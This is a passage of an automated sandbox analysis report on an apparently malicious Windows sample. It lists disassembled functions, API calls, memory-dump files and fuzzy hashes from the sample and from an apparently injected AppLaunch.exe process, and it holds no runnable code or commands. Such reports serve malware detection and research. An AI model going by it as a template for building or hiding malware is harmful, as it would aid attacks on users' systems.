Function 0090DFF0 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(27D23252), ref: 0090E053
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0090E2AE
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0090E2F6
GetLastError.KERNEL32 ref: 0090E399

Memory Dump Source

Source File: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: d344b6998516ef847eaab2dfc6e70e20a541378a92bce901ffec8fc1ed9c5983
Instruction ID: 7ec321e165295564bab08a9b4df8b57aca54e6ff68689b41544726e3e335c176
Opcode Fuzzy Hash: d344b6998516ef847eaab2dfc6e70e20a541378a92bce901ffec8fc1ed9c5983
Instruction Fuzzy Hash: CED16AB5D042589FCF05CFA8D880AEDBBB9FF49314F18492AE855EB391D730A945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00907082 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0090708A
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009070C2
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009070E2

Memory Dump Source

Source File: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free
String ID:
API String ID: 3328510275-0
Opcode ID: 373f867f18c9255e7d2e2d428b2ab653f7ebaa416b981b29c35762ea0d6f48ba
Instruction ID: 9d583142fa3a0e39a22043609af33f53aad84f72a2c193498a1f4832f9c4b065
Opcode Fuzzy Hash: 373f867f18c9255e7d2e2d428b2ab653f7ebaa416b981b29c35762ea0d6f48ba
Instruction Fuzzy Hash: 911104B191D1197EFB2127F9AC8ACBFAA6CDE883B53100434F801D5181FE24EE0091B1

Uniqueness

Uniqueness Score: -1.00%

Function 0090FB78 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?), ref: 0090FB8E
GetLastError.KERNEL32(?,?,?,?), ref: 0090FB9B
SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 0090FBC1
SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 0090FBE7

Memory Dump Source

Source File: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID: FilePointer$ErrorLast
String ID:
API String ID: 142388799-0
Opcode ID: d62d593c8474fb280a06b90fb562cbbd3384d78e18a142df8cbdec83657483e1
Instruction ID: c23877f0eaa1b79315cc3f63119127fb865478c4c937b12e321a7107414d75fd
Opcode Fuzzy Hash: d62d593c8474fb280a06b90fb562cbbd3384d78e18a142df8cbdec83657483e1
Instruction Fuzzy Hash: C311457591411ABFDB209F54DC689EE7F7DEF04760F204564F828A21A1DB71CA50DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0091F83F Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 0091F859
GetLastError.KERNEL32 ref: 0091F865
___initconout.LIBCMT ref: 0091F875

Part of subcall function 0091F8F3: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0091F87A), ref: 0091F906

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 0091F889

Memory Dump Source

Source File: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CreateErrorFileLast___initconout
String ID:
API String ID: 3431868840-0
Opcode ID: 390b50d1cfb3ee71ce4f465a43634a42dd810d53077505e4871e648a2284ec1c
Instruction ID: 501dd3b484a8a7995d6472a2bed07c9a172849013fe6cbc6662c9f2450f7fe20
Opcode Fuzzy Hash: 390b50d1cfb3ee71ce4f465a43634a42dd810d53077505e4871e648a2284ec1c
Instruction Fuzzy Hash: 35F0823A218504BBCB221BDAEC14D567FA6FFCA3117204479FA8AC2130CB319850EF61

Uniqueness

Uniqueness Score: -1.00%

Function 0091F95B Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 0091F972
GetLastError.KERNEL32 ref: 0091F97E
___initconout.LIBCMT ref: 0091F98E

Part of subcall function 0091F8F3: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0091F87A), ref: 0091F906

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 0091F9A3

Memory Dump Source

Source File: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CreateErrorFileLast___initconout
String ID:
API String ID: 3431868840-0
Opcode ID: e8196fba714a93bde9a1e13caa51c559c3271623cabcbc69976f4c61ee2082c5
Instruction ID: e0925b26f47d4bafe04a235deb797f239838fb1894ac1519cfbbb7971c2a605f
Opcode Fuzzy Hash: e8196fba714a93bde9a1e13caa51c559c3271623cabcbc69976f4c61ee2082c5
Instruction Fuzzy Hash: 38F0303621411DBBCF222FD5EC14AE93F66FF4A3A1F154161FE0985131CB328860EB91

Uniqueness

Uniqueness Score: -1.00%

Function 0087B467 Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNEL32 ref: 0087B48A
LeaveCriticalSection.KERNEL32(009FC410), ref: 0087B494
WaitForSingleObjectEx.KERNEL32(?,00000000), ref: 0087B4A5
EnterCriticalSection.KERNEL32(009FC410), ref: 0087B4AC

Memory Dump Source

Source File: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: 18ffedcceb9943cf1c84f9e579603e6cc01cfa2955de17f671417118d4d2a0c3
Instruction ID: 9bb5b826b344d80e9a5ffb8919e913c3b5176ed261105a2b4134a89822202b94
Opcode Fuzzy Hash: 18ffedcceb9943cf1c84f9e579603e6cc01cfa2955de17f671417118d4d2a0c3
Instruction Fuzzy Hash: FFE0923659822CB7C7021B80FD29BBD3F25FF48758B08C020F609921328B655810EBD9

Uniqueness

Uniqueness Score: -1.00%

Function 00900E2D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON

Download Yara Rule

Strings

GetXStateFeaturesMask, xrefs: 00900E3D
InitializeCriticalSectionEx, xrefs: 00900E8D

Memory Dump Source

Source File: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID:
String ID: GetXStateFeaturesMask$InitializeCriticalSectionEx
API String ID: 0-4196971266
Opcode ID: 4f34568d7b50be7229387f4a32ccdacd7833794f5a91ab1364d4b601eaabd200
Instruction ID: a38896ec39de35acee7a974c279f29816a704e3da83bc0c126bba5cf473ddebb
Opcode Fuzzy Hash: 4f34568d7b50be7229387f4a32ccdacd7833794f5a91ab1364d4b601eaabd200
Instruction Fuzzy Hash: A901A7355C0228B7CB113B91EC06F9E7E16DFC0BA5F048422FD18696D0CEB65921D6D1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: AppLaunch.exePID: 5064, Parent PID: 3140COMMON

Execution Graph

Execution Coverage:	16.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	15.6%
Total number of Nodes:	77
Total number of Limit Nodes:	9

Executed Functions

Function 0C8C4500 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 355
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0C8C46A1

Strings

1, xrefs: 0C8C47E0
., xrefs: 0C8C475B

Memory Dump Source

Source File: 00000005.00000002.1849900897.000000000C8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c8c0000_AppLaunch.jbxd

Similarity

API ID: InitializeThunk
String ID: .$1
API String ID: 2994545307-1839485796
Opcode ID: f114448a922ca29a465910e6f0fd833c946701702ecffe73902c6b010d86f89d
Instruction ID: 23726b5a06c221575177267b1cb0cbed143914053f20ee421be3e3e01fdc19f3
Opcode Fuzzy Hash: f114448a922ca29a465910e6f0fd833c946701702ecffe73902c6b010d86f89d
Instruction Fuzzy Hash: 5EF1C274E01228CFDB28DF65C994BADBBB2FF89305F1081AAD509A7254DB319E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 0C8C0118 Relevance: 5.3, Strings: 4, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 0C8C026D
$^q, xrefs: 0C8C027D
$^q, xrefs: 0C8C030D
$^q, xrefs: 0C8C02F7

Memory Dump Source

Source File: 00000005.00000002.1849900897.000000000C8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c8c0000_AppLaunch.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 0f0c3c4e474e4ec52a67d8b5b13d71924200a71d33e0934ba5ca99c4058b77d7
Instruction ID: e763d6d9912175eeead147e3db08a9db5534c9e8ed577a41998f27bd84bf392c
Opcode Fuzzy Hash: 0f0c3c4e474e4ec52a67d8b5b13d71924200a71d33e0934ba5ca99c4058b77d7
Instruction Fuzzy Hash: 97C1D370E0121CCFDB24DFA9C980B9DBBB2BF89344F2091AAD419AB355DB349981CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0C8C1F18 Relevance: 2.8, APIs: 1, Instructions: 1290
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.1849900897.000000000C8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c8c0000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d271894eff94168989f6809911c355ebe7cab0e3e8419b0dc7af9e3b621ed0f0
Instruction ID: 9c5354af650f1b08f4452a8eac0acf2c33a355a431c42234e2577169bfba4d6b
Opcode Fuzzy Hash: d271894eff94168989f6809911c355ebe7cab0e3e8419b0dc7af9e3b621ed0f0
Instruction Fuzzy Hash: 20E29BB4E012288FCB65DF28C984B9DBBB5BB49304F5081EAE50DA7350DB34AE85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0C8C0F18 Relevance: 2.7, Strings: 2, Instructions: 234
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 0C8C11EE
-TVw, xrefs: 0C8C0FE5

Memory Dump Source

Source File: 00000005.00000002.1849900897.000000000C8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c8c0000_AppLaunch.jbxd

Similarity

API ID:
String ID: -TVw$$^q
API String ID: 0-2898040685
Opcode ID: 5e8297ad6dca29e4391243d5b9c568053bd7eca9b67cf406d77d5bafbb069530
Instruction ID: 52ed5bfad2116819dfee5e2fc16f1f33db9c32ced34a276fea62867310a01efe
Opcode Fuzzy Hash: 5e8297ad6dca29e4391243d5b9c568053bd7eca9b67cf406d77d5bafbb069530
Instruction Fuzzy Hash: A7B1F074E01228CFDB24DFA8C984B9DBBB2BF89300F1081A9C409AB355DB349E85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0C8C2EA5 Relevance: .5, Instructions: 499COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1849900897.000000000C8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c8c0000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a95d768eb1ee7270f10a2166beb6577d35835949e58d5d06223f38984a5ac018
Instruction ID: 2f9f09ea57e4d7766737959f9273ff9cd97808e9b70ea9896b7d0135397521a8
Opcode Fuzzy Hash: a95d768eb1ee7270f10a2166beb6577d35835949e58d5d06223f38984a5ac018
Instruction Fuzzy Hash: 3042C0B4A012289FCB64DF24C984B9DBBB6FB49205F5081E9D50DA7350DB34AEC5CF19

Uniqueness

Uniqueness Score: -1.00%

Function 00D76EA8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00D78A59

Memory Dump Source

Source File: 00000005.00000002.1825948583.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d70000_AppLaunch.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 825440a30980e0e6e7f7fd191a0c692b2b424d03b8970fb1eca624681ddb3f74
Instruction ID: 93bb3a318eef97094b1abc592ca963bff0452e9fbb162e95b346f9a358459aea
Opcode Fuzzy Hash: 825440a30980e0e6e7f7fd191a0c692b2b424d03b8970fb1eca624681ddb3f74
Instruction Fuzzy Hash: 3E41C3B0C00719CFDB24DFA9C94479EBBF5BF48304F24806AD408AB255EB756945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00D789A4 Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00D78A59

Memory Dump Source

Source File: 00000005.00000002.1825948583.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d70000_AppLaunch.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 05ba1afe1c3ef087d82df7c14e7bfb3c318a659287beba33bca6521b737e27aa
Instruction ID: 03bcd7b069d71e3057156c73ccca4f4109b22d401b5910093362eb3444c7195a
Opcode Fuzzy Hash: 05ba1afe1c3ef087d82df7c14e7bfb3c318a659287beba33bca6521b737e27aa
Instruction Fuzzy Hash: 9741E1B0C00719CFDB24DFA9C844B8EBBB5FF48304F24806AD408AB255EB756986CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00D7DBB8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00D7E179,00000800,00000000,00000000), ref: 00D7E38A

Memory Dump Source

Source File: 00000005.00000002.1825948583.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d70000_AppLaunch.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 86de34f6165c01c2c21d8e384e27348ea451d745e9b3bd76d3102bf7cb3f51cd
Instruction ID: 8482493038b2ab5fe8526c9a51607a22be4c3a94a425adcb8f606f266661c07e
Opcode Fuzzy Hash: 86de34f6165c01c2c21d8e384e27348ea451d745e9b3bd76d3102bf7cb3f51cd
Instruction Fuzzy Hash: 851114B69003588FDB10CF9AC444ADEFBF4EB48314F14846AE559BB210D374A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0C8C97C8 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E58,?,?,0C8C9CD6), ref: 0C8C9DDE

Memory Dump Source

Source File: 00000005.00000002.1849900897.000000000C8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c8c0000_AppLaunch.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 7b3d143ce61cbd7cbccbcb79b2f6a364ff956448fbd1ab78a6c54385f0856fd5
Instruction ID: a97f09ab39ae441332fe4b7f7f77f453e98b0eb8d988f71a4a963ca773034e4a
Opcode Fuzzy Hash: 7b3d143ce61cbd7cbccbcb79b2f6a364ff956448fbd1ab78a6c54385f0856fd5
Instruction Fuzzy Hash: 4E1112B5E006498BDB20CF9AC584A9EFBF4EF88325F14846AD519B7210C774A545CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0C8C9D76 Relevance: 1.6, APIs: 1, Instructions: 51libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E58,?,?,0C8C9CD6), ref: 0C8C9DDE

Memory Dump Source

Source File: 00000005.00000002.1849900897.000000000C8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c8c0000_AppLaunch.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 7a295f71a573a8d7567a8810aaff85cee85bd1d6eb5dd8d4fb14652fa942964b
Instruction ID: 1c8e0cda8fc78d7f7ddd3845a6da32a5b189d3b65c09dc1552e652e95a5eda30
Opcode Fuzzy Hash: 7a295f71a573a8d7567a8810aaff85cee85bd1d6eb5dd8d4fb14652fa942964b
